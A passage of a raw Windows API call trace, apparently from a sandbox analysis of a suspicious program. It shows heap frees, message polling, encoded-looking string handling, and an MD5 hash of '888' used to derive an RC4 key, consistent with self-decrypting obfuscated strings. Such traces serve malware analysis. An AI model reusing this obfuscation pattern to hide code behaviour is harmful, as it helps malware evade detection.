hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0121.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.741] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0121.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0121.742] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.742] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.742] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0121.742] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.742] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0121.742] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0121.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0121.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0121.742] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf088) returned 1 [0121.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.743] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0121.743] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.743] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0121.743] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.743] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.743] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.744] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.744] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.744] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.744] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.744] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.744] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.744] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.745] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.745] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.745] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.745] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.745] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.745] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.745] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.745] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0121.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.745] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0121.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa360, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0121.746] CryptCreateHash (in: hProv=0x9bf088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0121.746] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0121.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0121.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.746] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.746] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0121.747] CryptHashData (hHash=0x9a4900, pbData=0x2a71c08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0121.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.747] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa3c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0121.747] CryptDeriveKey (in: hProv=0x9bf088, Algid=0x6601, hBaseData=0x9a4900, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4880) returned 1 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.748] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0121.748] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.748] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0121.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, 